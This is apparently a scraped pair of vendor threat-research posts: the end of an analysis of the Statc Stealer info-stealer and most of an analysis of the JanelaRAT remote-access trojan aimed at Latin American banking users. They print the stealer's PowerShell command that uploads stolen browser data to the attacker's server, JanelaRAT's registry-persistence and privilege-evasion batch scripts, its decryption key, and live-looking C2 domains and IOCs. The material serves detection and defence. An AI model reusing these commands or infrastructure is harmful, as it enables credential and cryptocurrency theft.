sample is downloaded.95[.]217[.]5[.]87[/]Setup64_new0[/]Version2023-new[.]exe
Payload URLThe URL below is malicious and shows the domain from where the Statc payload is downloaded.check[.]topgearmemory[.]comIn the screenshot below, the address bar contains the malicious URL. You can see how the Statc Stealer payload imitates an MP4 file format. The use of MP4 format to disguise malicious behavior lends Statc Stealer an innocent appearance, making it harder for traditional security measures to detect its true intent.Figure 2: Malicious URL used to download Statc Stealer payloadTechnical AnalysisEvasion using anti-analysis techniquesTypically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the victim’s machine.We found one anti-analysis technique while analyzing Statc Stealer:The sample looks for its original file nameChecks whether its file name is the same as its internal name Stops executing if it finds differencesEssentially, if Statc Stealer discovers that you’ve changed or updated its malicious files, then it stops in its tracks. The code example in the image below shows how:The sample used a FileName checkThe sample compares the file name with a hardcoded encrypted string Figure 3: File name comparison codeTheft and exfiltration of dataStealing activityStatc Stealer has a general information stealing capability. It’s able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.Using the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.The image below shows various references to “wallets'' and “crypto”, indicating that sensitive cryptocurrency information has been compromised.Figure 4: Decrypted strings using python scriptEncrypted stringsFigure 5: Encrypted strings Decrypted stringsFigure 6: Decrypted stringsBrowser exfiltrationBrowser exfiltration is the unauthorized transfer of any data from a browser. It can involve social engineering, phishing attacks and emails, and even uploading data to an insecure hard drive. However, Statc Stealer uses its malicious software to drop and execute malicious files. Let’s explore how this works.How it worksStatc Stealer employs a straightforward and easily detectable technique to steal browser data. It leverages the Invoke-WebRequest Uniform Resource Identifier (URI) in PowerShell to initiate a process, using the following arguments:Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\Users\\AppData\Local\Temp\\41075.txt -UseDefaultCredentials -UseBasicParsing ; Remove-Item C:\Users\\AppData\Local\Temp\\41075.txtThe significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and send it securely to its C&C server. This allows the malware to harvest valuable information, such as login credentials and personal details, for malicious purposes like identity theft and financial fraud. Despite its simplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the development of effective countermeasures. Targeted browsersThe Statc Stealer malware can exfiltrate data from the following browsers:ChromeMicrosoft EdgeBraveOperaYandexMozilla FirefoxIt comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows browsers, By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise sensitive data from a larger pool of unsuspecting users.Stealing autofill dataStatc Stealer is also capable of exfiltrating autofill data. If a stealer takes autofill data, login credentials, Personally Identifiable Information (PII) and payment information is at risk:Usernames and passwordsEmailCredit card detailsPersonal addressesPayment informationStolen data Figure 7: Stolen data in decrypted formData in encrypted formFigure 8: Stolen data after encryptionIn the images above, the Statc Stealer is exfiltrating browsers’ autofill information. From here, the malware will encrypt the stolen data and store it in a text file in the Temp folder.Process Monitor (ProcMon)Process Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It can help provide a snapshot into the types of sensitive information Statc Stealer is capable of stealing.Using ProcMon, we observed that Statc Stealer steals:user’s cookies dataweb datalocal state data preferences login datavarious different wallets informationFileZillabrowsers autofillsanydesk ronin_edgemeta mask Telegram dataWe captured this malicious activity in ProcMon in the image below.Figure 9: Browser related data shown in ProcMonWallet dataThe Statc Stealer can exfiltrate data from various wallets, like:Cryptocom-WalletPetra-aptos-walletexodus-web3-walletbitkeep-crypto-nft-walletliquality-walletethos-sui-walletsuite-sui-wallettallsman-polkadot-walletEnkrypt-ethereum-polkadotleap-cosmos-walletpontem-aptos-walletfewcha-move-walletrise-aptos-walletteleport-walletmartin-wallet-aptos-suiavana-wallet-solana-walletglow-solana-wallet-betasolflare-walletTransfer And Storage Of Stolen DataIn the case of Statc Stealer, cybercriminals are using a command-and-control (C&C) server network to move and store stolen data. A C&C server is a system controlled by the cybercriminals who distribute stealer malware to take sensitive data. The C&C server acts as their secure storage compartment where they send and store encrypted data for later use.The image below shows how Statc Stealer saves stolen data into text files and stores them in the Temp folder.Figure 10: Stolen data in Temp folder The image below shows how Statc Stealer tries to send the data (after it’s been encrypted) to its C&C server.Figure 11: Stolen data, in encrypted format, sent to C2Other Unusual ActivitySome malware may attempt to leverage less commonly monitored or analyzed registry locations to evade detection by security software. By choosing a relatively obscure location like this one, cybercriminals may hope to bypass certain detection mechanisms or security controls.Figure 12: Sample checking its presence in Shell Compatibility in RegistriesConclusionIn conclusion, the emergence of the new info stealer, Statc Stealer, highlights the relentless evolution of malicious software in the digital realm. Based on the observations made during analysis, we feel confident in saying that Statc Stealer:falls under the category of “info stealer” in malware typestargets users of Window's operating systemsis sophisticated and can perform various malicious activities if its able to gain access to your personal computer (Windows)targets sensitive information from web browsers and cryptocurrency walletsCybercriminals and their expanding list of malware types is becoming more complex by the minute. The discovery of Statc Stealer demonstrates the importance of staying alert, ongoing research, and monitoring. This in itself is a form of malware protection. However, we also recommend security teams inspect all traffic and leverage malware prevention engine like Zscaler Cloud Intrusion Prevention Systems (IPS) for known threats and sandboxing technology for unknown threats.In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.Zscaler CoverageZscaler sandbox coverageZscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by Statc Stealer.To learn more about coverage, visit the Zscaler Sandbox webpage or Win64.PWS.StatcSteale the Threat Library, where we list all threats and threat information.Figure 13: Zscaler sandbox coverageMITRE ATT&CK mapping MITRE ATT&CK mapping tableIDNameT1547Boot or Logon Autostart ExecutionT1217Browser Information DiscoveryT1059Command and Scripting InterpreterT1555Credentials from Password StoresT1132Data EncodingT1005Data from Local SystemT1001Data ObfuscationT1189Drive-by CompromiseIndicators of Compromise (IOCs) MD5 hash tableMD5 HASHDESCRIPTIONf77dc89afbaab53e5f63626e122db61eDropper3834ec03aee0860dfd781805cac3e649 Downloader65affc4e1d5242a9c3825ce51562d596 Statc Stealer (source VT)e002c90a035495631a0abf202720a79cStatc Stealer (source VT)f49348fa15d87e92896363b40267c9aeStatc Stealer (source VT) Domain and IP details tableDOMAIN/IPURLDESCRIPTION95[.]217[.]5[.]8795[.]217[.]5[.]87[/]Setup64_new0[/]Version2023-new[.]exeMALICIOUS URLcheck[.]topgearmemory[.]comcheck[.]topgearmemory[.]com/dw/9c890e1b2b4f2723a68fc905268ee010cae232be[.]txtMALICIOUS URLcheck[.]topgearmemory[.]comhttps[:]//topgearmemory[.]com/kdsfedafa/stat?c=BOTNET File namesVersion2023-new.exechtgpt_x64.exeSearchApplication.exesound_adapter.exeTue, 08 Aug 2023 11:59:42 -0700Shivam Sharmahttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threatJanelaRAT: Repurposed BX RAT Variant Targeting LATAM FinTech
https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech
Introduction
In June of 2023, our research team at Zscaler ThreatLabz discovered a threat actor targeting FinTech users in the LATAM region. JanelaRAT involves several tactics, techniques, and procedures (TTPs) such as DLL side-loading, dynamic C2 infrastructure, and a multi-stage attack.
The final malware involved in this campaign is a heavily modified variant of BX RAT. Because of this, we named the malware: JanelaRAT.
Key Takeaways
Financial Data in LATAM: As of June 2023, JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions.
New, Nefarious Capabilities: JanelaRAT features a windows titles sensibility mechanism that allows the malware to capture window title data and send it to the threat attackers.
Strategic and Exploitative Behavior: JanelaRAT employs a dynamic socket configuration system. The C2 infrastructure used by the threat attackers heavily abuses dynamic DNS services. Each domain is set up in the infrastructure to be active only on a certain day of the month.
Evasive Maneuvers: JanelaRAT abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection.
Origin of Threat Actor: The developer of JanelaRAT is Portuguese-speaking. There is heavy use of Portuguese in the malware strings, metadata, decrypted strings, etc.
Attack Chain
This campaign involves a multi-stage infection chain with a moderate complexity level.
The attack chain is kick started by a VBScript sent inside ZIP archives. (At the time of writing this blog, we do not know exactly how these ZIP archives were distributed to the users.)
The VBScript performs two key actions:
It fetches a ZIP archive from the attackers' server
It drops a BAT file on the endpoint to prepare the system for the next stage of infection
The ZIP archive contains two components which are responsible for carrying out the rest of the infection chain and accomplish DLL side-loading.
The image below is a high-level view of the campaign’s attack chain.
Figure 1: End-to-end attack chain of the campaign used to distribute JanelaRAT
Technical Analysis
VBScript Analysis
For the purposes of technical analysis, we used this VBScript with MD5 hash:
24c6bff8ebfd532f91ebe06dc13637cb
The code obfuscation in the VBScript is very primitive. After decoding all the strings in the VBScript, its purpose became evident to our team.
The main operations performed by the VBScript are as follows:
Drops a BAT file in the path: C:\Users\Public\ with a randomly generated 7-character alphanumeric name.
Downloads content from the URL: hxxp://zimbawhite.is-certified[.]com:3001/clientes/6 and parses it to extract a base64-encoded ZIP archive.
Base64 decodes the content and saves the ZIP archive with a randomly generated 8-character alphanumeric file name.
Executes the BAT file.
Sleeps for 5 seconds and restarts the victim's machine.
We observed that the URL used to download the base64-encoded ZIP archive was actually hosting 44 different variants of the archives, all stored base64-encoded. Since the URL was active at the time of our analysis, we were able to download all 44 variants of the ZIP archives. A Python script is included in the Appendix section of this blog to help you automate this process.
The image below shows the web response when the URL is accessed directly without specifying the index. The response contains all 44 ZIP archives base64-encoded.
Figure 2: Base64-encoded ZIP archives received in web response from attacker's server
All these ZIP archives include components with different file hashes but similar functionality. This indicates that the main purpose of this method is evasion of file hash-based detection.
Batch Script Analysis
Batch script persistently triggers the JanelaRAT execution (via DLL side-loading)
@echo off
timeout /t 2 /nobreak >nul
xcopy /q C:\Users\Public\Q3xk0o\VCRUNTIME140.dll C:\Users\willi\AppData\Roaming
timeout /t 2 /nobreak >nul
xcopy /q C:\Users\Public\Q3xk0o\opdrde.exe C:\Users\willi\AppData\Roaming
timeout /t 2 /nobreak >nul
timeout /t 2 /nobreak >nul
ren C:\Users\willi\AppData\Roaming\opdrde.exe IWf2u49.exe
timeout /t 2 /nobreak >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_ /d C:\Users\willi\AppData\Roaming\IWf2u49.exe /f
set "pasta=C:\Users\Public\Q3xk0o"
rmdir /s /q "%pasta%"
The purpose of the batch script is to set up a persistent mechanism so the JanelaRAT sample is automatically launched at each system reboot. This is achieved by:
Setting up a so-called RunKey. This allows a particular registry key hosting the path to a file and granting that file execution at reboot time.
The batch script set the RunKey to the legitimate executable included in the second compressed archive.
The execution of that file will cause the loading and execution of the JanelaRAT DLL.
The key name (MicrosoftEdgeAutoLaunch_) was chosen so it can appear innocuous, like the legitimate RunKey for the Microsoft Edge browser.
DLL side-loading
JanelaRAT comes in the form of a DLL side-loaded by a legitimate executable. Depending on the legitimate executable employed in the attack, the DLL may have different names.
We discovered these two:
VCRUNTIME140.dll: side-loaded by vmnat.exe
msedge_elf.dll: side-loaded by identity_helper.exe
The legitimate executable, which is included in the compressed archive with JanelaRat, is usually renamed.
In the table below, you can see metadata information of the JanelaRAT sample we used for technical analysis in this section
Metadata information of the analyzed JanelaRAT instance
Name
VCRUNTIME140.dll
MD5
c18edb805748b4bd5013ccb47f061c2a
SHA1
37df375be813d91e11795a75872479c1a656e951
SHA256
0c873439bc0af08fdf0c335c5a94752413fd096c0c2f1138f17e786bc5ce59c3
The DLL was developed in C# for Microsoft .NET 4.0 and the source code is protected by Eazobfuscator - a commercial code obfuscator for .NET assemblies.
The image below shows the assembly metadata containing clear-text strings in Portuguese, supporting our hypothesis about the threat attacker's intention to make JanelaRAT seem like a real cybersecurity tool. For instance:
"Firewall de Rede" means network firewall
"Plataforma de Segurança Mulitcanal" means multichannel security platform
"Ferramenta de Segurança Inteligente" means smart security tool
"Análise de Segurança de Banco de Dados" means database security analysis
At a glance, these seemingly legitimate security strings can make JanelaRAT appear like a real cybersecurity tool.
Figure 3: JanelaRAT impersonating as a cybersecurity tool using well-crafted metadata
Self-Defense Mechanisms
String encryption
Most of the JanelaRAT strings are encrypted and stored in a dedicated class as a form of anti-analysis. Each field of this class contains either an encrypted string or an array of encrypted strings. The string decryption algorithm can be broken down in the following steps:
The encrypted string is decoded using base64.
Once decoded, the string is decrypted. The decryption algorithm is Rijndael AES in Cipher Block Chaining (CBC) mode.
The decryption key is always the same for all the strings and, to the best of our knowledge, it is the same across the samples: the MD5 of the string 8521.
The Initialization Vector (IV) varies for each string, being set to the first 16 bytes of the string decoded in the point above. The decryption is only applied to the remaining bytes.
We provide a Python implementation of this algorithm in the Appendix section of this blog.
Idle if inactive
JanelaRAT utilizes a basic self-protection mechanism to mitigate the risk of being detected.
Every 5 seconds the malware checks the time elapsed from the system start to the last input event that occurred on the infected system.
If this time span exceeds 10 minutes then the malware transitions into an idle state.
While in the idle state, JanelaRAT stays silent by not exposing any unnecessarily risky behavior that might arouse suspicion.
The image below shows the method used to perform the inactivity check. The method call is a wrapper around the GetLastInputInfo native API, responsible for instantiating a LASTINPUTINFO data structure. The dwTime field of such a structure contains the milliseconds elapsed since the last input event. The method returns true if the amount of time passed from the system start (Environment.TickCount), to the last input received (dwTime), exceeds 10 minutesFigure 4: JanelaRAT checks if the infected system has been inactive (no input events) for more than 10 minutes
In the image below, you can see that:
if the check returns true, the malware sets its internal state to "Idle"
if the check returns false, the malware sets its internal state to "Active"
The state transition, regardless if true or false, is communicated to the threat attacker through the C2. You can see this in action in the image below.
Figure 5: JanelaRAT communicating state transition to threat actors using C2
Network and Communication
C2 check-in
Once it gets started, JanelaRAT makes a request to register the newly-infected host to the threat attacker’s network.
The C2 domain is always the same: cnt-blackrock.geekgalaxy[.]com
The HTTP verb is GET
The User-Agent is hardcoded and rather peculiar: VisaoAPP
The image below shows that the GET request consists of four parameters.
Figure 6: JanelaRAT checks-in to the attacker's network of compromised hosts
JanelaRAT's request parameters to join attacker's network
Parameter
Description
op
Quadruple (OS major, OS minor, OS architecture code, OS integer pointers size). The quadruple is provided as a pipe-separated (“|”) string. Example: 0|4|2|32
us
Role of the user logged in at the time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese).
nm
Machine name
vs
Malware version string, e.g. 1.0.6.4.
The malware makes this request attempt only if it doesn’t find a file named fi.ini in the temporary files directory. Any response from the server isn't handled.
C2 rotation and communication
The JanelaRAT configuration contains 32 domains used for C2 communication. Those domains are encrypted with the algorithm described earlier in the String Encryption section. The selection in that array is guided by the day of the month when making the request.
For example, the following table shows the domain array for all the JanelaRAT samples we analyzed.
JanelaRAT C2 domains
0
aigodmoney009[.]access[.]ly
11
myfunbmdablo99[.]hosthampster[.]com
22
minfintymexbr[.]geekgalaxy[.]com
1
freelascdmx979[.]couchpotatofries[.]org
12
irocketxmtm[.]hopto[.]me
23
cinfintymex[.]geekgalaxy[.]com
2
439mdxmex[.]damnserver[.]com
13
hotdiamond777[.]loginto[.]me
24
9mdxmex[.]damnserver[.]com
3
897midasgold[.]ddns[.]me
14
imrpc7987bm[.]mmafan[.]biz
25
ikmidasgold[.]ddns[.]me
4
disrupmoney979[.]ditchyourip[.]com
15
dmrpc77bm[.]myactivedirectory[.]com
26
rexsrupmoney979[.]ditchyourip[.]com
5
kakarotomx[.]dnsfor[.]me
16
jxjmrpc797bm[.]mydissent[.]net
27
kktkarotomx[.]dnsfor[.]me
6
skigoldmex[.]dvrcam[.]info
17
askmrpc747bm[.]mymediapc[.]net
28
megaskigoldmex[.]dvrcam[.]info
7
i89bydzi[.]dynns[.]com
18
myinfintyme09[.]geekgalaxy[.]com
29
izt89bydzi[.]dynns[.]com
8
infintymexbrock[.]geekgalaxy[.]com
19
infintymex747[.]geekgalaxy[.]com
30
zeedinfintymexbrock[.]geekgalaxy[.]com
9
brockmex57[.]golffan[.]us
20
infintymexb[.]geekgalaxy[.]com
31
zeedinfintymexbrock[.]geekgalaxy[.]com
10
j1d3c3mex[.]homesecuritypc[.]com
21
jinfintymexbr[.]geekgalaxy[.]com
As you may notice, there is an extra domain at index 0 that will never be used by the C2 domain rotation algorithm. Furthermore, the domains for day 30 and day 31 are the same.
The C2 channel is implemented as a socket opened to the resolution IP of the daily C2 domain. The socket port is obtained by making a request for a text file named 16Psyche.txt. This file contains just the port, encrypted with the algorithm discussed in the String Encryption section.
JanelaRAT implements a custom protocol to communicate with the C2. This protocol is defined by a hierarchy of classes representing the type of messages expected to be exchanged between the malware samples and the C2 server. We call those messages "packets" because this feature was imported from BX RAT, where all those classes implement the same interface called "packet". We found packets for:
mouse inputs
keyboard inputs
screenshot captures
and more
When any of those packets is instantiated to be shipped through the C2 channel, the instance is:
serialized into an array of integers
encrypted with a custom implementation of RC4 with key 8521
compressed with a custom implementation of the LZ4 algorithm
eventually sent through the C2 channel
The image below shows an example a packet class representing a sequence of keystrokes sent by the threat attacker to the malware so that they can be sent to the targeted window. This class defines specific fields (e.g., the string containing the keystrokes) with a method responsible for implementing the communication procedure.
Figure 7: Example of packet class used by JanelaRAT to implement its C2 communication procedure
Capabilities
Capture and check window data
JanelaRAT captures the content of windows title bars and checks if they are interesting for the threat attacker. "Interesting" titles will be related to financial and banking data.
The malware implements a periodic behavior triggered every second and consists of three consecutive stages.
Stage 1
At the first stage, JanelaRAT checks if it obtained a list of interesting title bars. If not, then the malware requests a text file named kepler186f.txt to the C2. The content is encrypted with the same algorithm used for the strings. (Since the campaign was still active at the time of analysis, we were able to download an instance of such a file.) Once decrypted, you can see that it consists of a pipe-separated ("|") list of capitalized windows titles.
You can see an excerpt of the decrypted content in the box below.
Excerpt from an instance of kepler186f.txt
BANCOAZTECATUBANCAENLNEASUEASDECIDESLOGRAS|BITCOIN|SOLANA|ACTINVER|ACCESOALSISTEMABURSANET|ACTINVERBANCO|
ACCESOCONSULTADESALDOS|EACTINVER|ACCESOABANCABANCOAZTECA|BIENVENIDOSALABANCAENLNEABBVAMXICO|EMPRESASYG
OBIERNOEMPRESASBBVAMXICO|INDEXBBVANET|BBVANETCASH|SANTANDERMXICOSPARTEDELABANCAELECTRNICA|BITCOIN|BTC|RIPP
LE|ETHEREUM|CASADEVECTOR|SANTANDER|SANTANDERM|ENLACESANTANDERCOMMXLOGBETENSCHANNELDRIVERSSOBTODSEOPE
RATIONNAMELOGINDSENEXTEVENTNAMESTARTDSEPROCESSORSTATEINITIALNOWCHECKINGCOOKIES|BANCOSANTANDERS|BBCOMM
XWEBCENTERPORTALBANBAJIOHOME|ELBANCODECONFIANZAPARAPERSONASPYMESGOBIERNOYAGRONEGOCIOS|BANCAPORINTERN
ETBBCOMMX| … [REDACTED]
Kepler186f.txt file content is parsed as an array of strings and stored as a class field for future use.
Stage 2
At the second stage, JanelaRAT checks the same DLL directory for the block.blq file. This file has a slightly different structure compared to the kepler186f.txt file. It is still composed of a single, pipe-separated, record but it only contains three fields:
a timestamp,
a base64-encoded image
a list of dash-separated ("-") window titles
The image below shows a snippet, belonging to the malware code, implementing the parsing logic for block.blq. If the file is outdated, then the malware deletes it.
Figure 8: JanelaRAT code snippet implementing the parser for block.blq file content
The window titles included as the third field in block.blq are titles of windows the attacker wants to block. When the title of the foreground window is included in the block.blq, the malware attempts to close it. The blocking mechanism is implemented by invoking the SendMessage API with WM_CLOSE value for the Msg argument. JanelaRat also visualizes a dialog to the victim showing a fake error message.
Stage 3
At the third stage, the malware checks if the title of the window in the foreground is appealing. The check is made after grabbing the title, capitalizing it, and eventually dropping all non-alphabetical characters. By "appealing", we mean what was discussed at Stage 1 (i.e., the title was in a previously parsed instance of kepler186f.txt). If the check succeeds, JanelaRAT opens a C2 channel in the form of a socket as discussed earlier. This channel is later used for alerting the threat attacker about the victim opening interesting windows, sending key logs, mouse clicks, and implementing remote desktop sessions.
Acquire host profile details
JanelaRAT is capable of collecting and sending information about the compromised host to the attacker. This information is encapsulated in a packet containing the fields reported in the following table. As you can see, the field names don't always correlate with their actual content. Moreover, some fields are left to the default values. Those aspects suggest that the original malware source code has been eventually modified or repurposed to fit the new needs of the operator.
JanelaRAT sends basic information about the compromised host to the attacker
Field Name
Field Value
Version
JanelaRAT version string. Hardcoded as 1.0.6.4 for the sample discussed in this section. One of the few unencrypted strings embedded in the malware.
OperatingSystem
A pipe-separated string containing the following fields: OS version major, OS version minor, OS platform, integer pointers size. Example: 0|4|2|32.
AccountType
A dash-separated string containing the following fields:
Role of the user logged in at time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese).
Country
A string containing the title of the last “interesting” window opened by the user. For interesting, we mean that is included in the content of the kepler186f.txt file (previously discussed). All non-alphabetical symbols are removed from the original title bar and the chars are upper-cased.
CountryCode
Empty string.
Region
Empty string.
City
Empty string.
ImageIndex
0
Track mouse movements
JanelaRAT is capable of sending mouse activity to through C2. It defines a packet class containing the following fields:
x-position of the cursor
y-position of the cursor
a boolean value set to true if the left button of the mouse is clicked
a boolean value set to true if the left button of the mouse was double clicked
Once serialized, an instance of this class is shipped.
Track system usage
JanelaRAT is capable of gathering additional information about the infected system usage.
System usage information gathered by JanelaRAT
Index
Element
0
User
1
[username of the user currently logged in]
2
PC
3
[machine name]
4
Ligado [connected in Portuguese, ed.]
5
[time elapsed since the last system reboot. It’s a string having the format {0}d : {1}h : {2}m : {3}s where {0}, {1}, {2}, {3} are placeholders for the number of days, hours, minutes, and seconds respectively]
6
IP
7
[comma-separated list of IP addresses currently associated with the infected system]
The malware assembles an array of strings containing the elements shown in the table above. Once assembled, the array is sent to the C2.
Open message boxes on the infected system
JanelaRAT gives a threat attacker the ability to open message boxes on the infected system, which may influence the behaviour of the user. After having shown the message box, the malware sends an acknowledgment to the C2. The acknowledge is another packet class containing a single field of type string called "Message" and instantiated with the value Mensagem mostrada ("Message shown" in Portuguese).
Perform actions
JanelaRAT is capable of performing a wide range of actions on the attacker’s behalf. Those actions are identified by an integer number called "Mode".
JanelaRAT is capable of performing action on behalf of the attacker
Mode
Description
1
Shuts down the infected system by issuing the shutdown shell command.
2
Suspends the infected system.
5
Enables mouse synthesization. This mode allows the attacker to simulate the mouse and issue clicks or double-clicks for the left button.
6
Enables sleep for one second.
8
Enables sleep for one second.
9
Create a file named 1.bat under the user directory. That file contains the following batch script:
cmd /min /C set __COMPAT_LAYER=RUNASINVOKER && start #1
cmd /min /C REG ADD HKCUControl PanelDesktop /v Win8DpiScaling /t REG_DWORD /d 0x00000001 /f
cmd /min /C REG ADD HKCUControl PanelDesktop /v LogPixels /t REG_DWORD /d 0x00000060 /f
The purpose of this script is to fix potential errors in rendering fonts. This script is executed with %SystemRoot%\taskmgr.exe as its first argument, resulting in executing the Task Manager application without requesting administrative privileges. The task Manager window is immediately hidden by running ShowWindow API with the SW_HIDE value for the nCmdShow argument. Finally, 1.bat is removed.
10
Deletes the file block.blq if it exists in the same folder as JanelaRAT.
11
Sends a test email by starting a new process with mailto:[email protected]?subject=teste&body=teste
12
Enables Desktop Windows Manager composition and sets the Aero Windows theme.
51
Disables mouse synthesization.
52
Shows the last selected window, waits 300 milliseconds, and eventually maximizes it.
80
Sends the {DOWN} key to the currently active application.
81
Sends the {UP} key to the currently active application.
82
Sends the {TAB} key to the currently active application.
99
Uninstalls any hook installed by JanelaRAT to monitor keyboard events and mouse events. In this specific case, there is no acknowledgement sent back to the attacker when the operation completes.
After an action is performed, with the exception of Mode 99, the malware sends a notification to the C2 by encapsulating Mode as the field of a packet class and shipping the serialized instance.
Capture screenshots
JanelaRAT is capable of capturing and shipping screenshots. It defines an packet class containing three fields:
Janela (window, in Portuguese): Integer dictating the type of screenshot operation being requested. If Janela is set to 1, the malware captures a magnified screenshot. If Janela is set to 2, then the malware live-captures a screenshot and sends it through the C2.
Mode: Integer that controls the encoding of the captured screenshot. If this field is set to a value bigger than 10, then the screenshot is encoded as a PNG, otherwise it is encoded as a JPG.
Number: This field is not used.
Run in special execution modes
JanelaRat ships with the capability of running in special execution modes. Each execution mode affects the malware behaviour and it is identified by a label. The attacker may request the malware to operate in any of those modes.
As an example, when in _blcoqueio_tempo_determinado mode, the malware creates a new block.blq file with a limited duration in minutes. The purpose of this behaviour is to temporarily prevent the user from opening windows with specific titles. The file is created only if it doesn’t already exist in the malware directory.
When in _modal_inicial mode, the malware shows a modal dialog that forces the user to interact with the malware by disabling user interaction with the main window. The foreground image for the dialog is obtained from C2. The malware registers a hook for both keyboard and mouse events.
When in _modal_win_update mode, JanelaRAT displays a fake alert warning the user to not shut the system down while the Windows updates are in progress. Most likely, this allows the attacker to operate on the compromised host while the fake warning is shown to the user.
Finally, when in _modal_loading, modal_error, or modal_tocalm, JanelaRAT operates in the same way: it shows an attacker-provided image to the user. The image is different in each mode, but we weren't able to obtain any of those at the time of analysis.
Relationship with BX RAT
BX RAT is a malware discovered in 2014 and is a fully-fledged Remote Access Trojan (RAT). BX RAT is capable of:
shell command execution
file download/upload
directory exploration
processes enumeration and killing
process creation
system information gathering
remote desktop control
and more
Figure 9: BX RAT event handlers - which indicate functionalities
Similarities between BX RAT and JanelaRAT
The threat attackers who created JanelaRAT took strong inspiration from the BX RAT code. In this section, we discuss similarities between BX RAT and JanelaRAT.
For BX RAT, we use an unpacked sample in circulation since 2014. The hashes are listed below:
Hashes of the BX RAT instance used to compare it with JanelaRAT
MD5
7e4592e02951be844a2ee603d75070a6
SHA1
be7e5282efe58018b462a5ba0a78a7f01108460d
SHA256
c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81
C2 communication procedure
We believe the JanelaRAT developer imported the C2 communication procedure from BX RAT. As shown in the image below, BX RAT serializes a packet instance as an array of integers. This array is later encrypted and finally compressed with a custom implementation of the LZ4 algorithm. The same we observed in JanelaRAT. The encryption algorithm, at least in this BX RAT sample, is a different one since it consists of a custom implementation of AES instead of RC4 - like in JanelaRAT.
Regardless, the two images below show the similarity between the BX RAT C2 transmission procedure (top) and the corresponding code in JanelaRAT (bottom).
Figure 10: BX RAT serializes a packet instance as an array of integers
Figure 11: JanelaRAT serializes a packet instance as an array of integers
LZ4 Algorithm
The custom implementation of the LZ4 algorithm is the same in BX RAT (top image) and JanelaRAT (bottom image).
Figure 12: Excerpt of BX RAT custom implementation of LZ4 compression algorithm
Figure 13: Excerpt of JanelaRAT custom implementation of LZ4 compression algorithm
The packets system, namely those classes representing packets exchanged by JanelaRAT and the C2 server, was imported from BX RAT. The images below show an example of the Status packet sent by both malware strains to acknowledge the attacker about any activity committed on the infected hosts.
Regardless, the two images below show the similarity between the BX RAT packet system (top) and the corresponding code in JanelaRAT (bottom).
Figure 14: Example of packet class defined in BX RAT
Figure 15: Example of packet class defined in JanelaRAT
Differences between JanelaRAT and BX RAT
JanelaRAT ships with just a subset of the features offered by BX RAT. The JanelaRAT developer didn't import shell commands execution functionality, or files and processes manipulation functionalities.
On the other hand, the JanelaRAT developer invested more energy in developing new capabilities such as the windows titles sensibility mechanism and the dynamic socket configuration mechanism.
Based on these observations, we believe that JanelaRAT is being repurposed as a variant of BX RAT to create a new malware strain.
Our Findings on JanelaRAT
Let's take a look at our findings and what led our team to those conclusions.
Malware developer is Portuguese-speaking: As mentioned earlier, all the samples we used in this analysis contain strings in Portuguese. The strings appear in both messages directed to the user (e.g., error messages appearing in popups) and events shipped to the attacker through the C2 channel.
Threat actors are targeting banking and financial institutions in LATAM: We found old code indicating that threat actors are targeting financial institutions in LATAM. A particular string caught our attention because it shines light on the attacker's intentions. Like other strings, this one is encrypted and stored as a field of a configuration class. The string is shown, in both its encrypted and decrypted form, in the table below. As you can see, the decrypted string contains multiple references to window titles related to Latin American organizations operating in the banking and decentralized finance verticals.
Likely a string containing an older configuration for JanelaRAT
Encrypted Form
qh7JCRu6U5xLyPrGW510TeZJBdE9sJ1w6ZDiYtlU6xp4x+HCTK53f6HNpbr74MxVlQ/786Lt5lmdyEvbbYEr5yUYC
07Fo9gqDf9B53BAMlKtWBD/oXTmWgWq/cwhtKIkmTERTkxr49oJxl+4MQt5E5oH3CYrF0+ixqhxss3QTkccZE6Kg
VeZdK4jJruk26MXH4csG02e0lIGK0HYsJgKOccjSxNOEdqUqZpVRki2W41Q8PMeekqY3i5cEyj+Meq/75bSLmaMI
U0h68cT1CxyIvfqaG3NQOlBYDaNW4XT66skZnHkXXy97P+fHVSx/nl/wZDKLGYjiNsvqTP4M48+yo0qt8RGyY5gT
ekuDUkm9FYuow+rCxiu0uuS7z1zdgNfJwfctP+VoKU1iKADnQN3OgBSW0pcryYtUAyyl3kPEBZFfg82FJ9qru5UFF
AEgSooBVfgCNuN+YwUwnXi2OsBcEaOMaV9f+CSxra8vceXsyrcPC1gD2AT+JGryCu0n21CQ57n6JymD6YyjL/G
OEGzpYE06DTt5oHL8HHClxoJU5//P4n6lPnj+wZMq/kyn++vf7de02rHehqrbyGW6jfy/95oviQO759CNctkhpKBvJi9
rroKLOPgwT4LRJC0MNCwD+J8QVomwZIl/SSFivvg6w==
Decrypted Form
OFF|NAO|dia06mx.est-a-la-maison.com|8022|BIENVENIDOSALABANCAENLNEABBVAMXICO|BIENVENIDOSA
LABANCAENLNEABBVAMXICO|INDEXBBVANET|BBVANETCASH|SANTANDERMXICOSPARTEDELABANCAE
LECTRNICA|SANTANDERM|BANCOSANTANDERSGOO|BANCONACIONALDEMXICOCITIBANAMEX|BANCAN
